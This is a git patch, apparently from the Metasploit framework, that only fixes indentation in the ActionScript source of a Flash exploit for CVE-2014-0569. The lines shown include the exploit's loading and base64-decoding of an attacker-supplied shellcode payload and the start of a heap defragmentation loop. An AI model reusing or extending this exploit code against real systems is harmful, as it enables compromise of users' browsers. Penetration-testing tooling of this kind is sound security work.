From 4f1ee3fcdf186ba69d24a0b3cc165e26f7dca92c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 9 Jun 2015 12:42:32 -0500 Subject: [PATCH] Really fix indentation --- .../source/exploits/CVE-2014-0569/Exploit.as | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/external/source/exploits/CVE-2014-0569/Exploit.as b/external/source/exploits/CVE-2014-0569/Exploit.as index fd7da7115f..49c4e20dfd 100755 --- a/external/source/exploits/CVE-2014-0569/Exploit.as +++ b/external/source/exploits/CVE-2014-0569/Exploit.as @@ -22,10 +22,10 @@ package private var uv:Vector. private var ba:ByteArray private var b64:Base64Decoder = new Base64Decoder(); - private var payload:ByteArray - private var platform:String - private var os:String - private var exploiter:Exploiter + private var payload:ByteArray + private var platform:String + private var os:String + private var exploiter:Exploiter private var defrag:Vector. = new Vector.(100) private var ov:Vector. = new Vector.(200) @@ -34,13 +34,13 @@ package var i:uint = 0 var j:uint = 0 - platform = LoaderInfo(this.root.loaderInfo).parameters.pl - os = LoaderInfo(this.root.loaderInfo).parameters.os - var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh - var pattern:RegExp = / /g; - b64_payload = b64_payload.replace(pattern, "+") - b64.decode(b64_payload) - payload = b64.toByteArray() + platform = LoaderInfo(this.root.loaderInfo).parameters.pl + os = LoaderInfo(this.root.loaderInfo).parameters.os + var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh + var pattern:RegExp = / /g; + b64_payload = b64_payload.replace(pattern, "+") + b64.decode(b64_payload) + payload = b64.toByteArray() for (i = 0; i < defrag.length; i++) { defrag[i] = new ByteArray()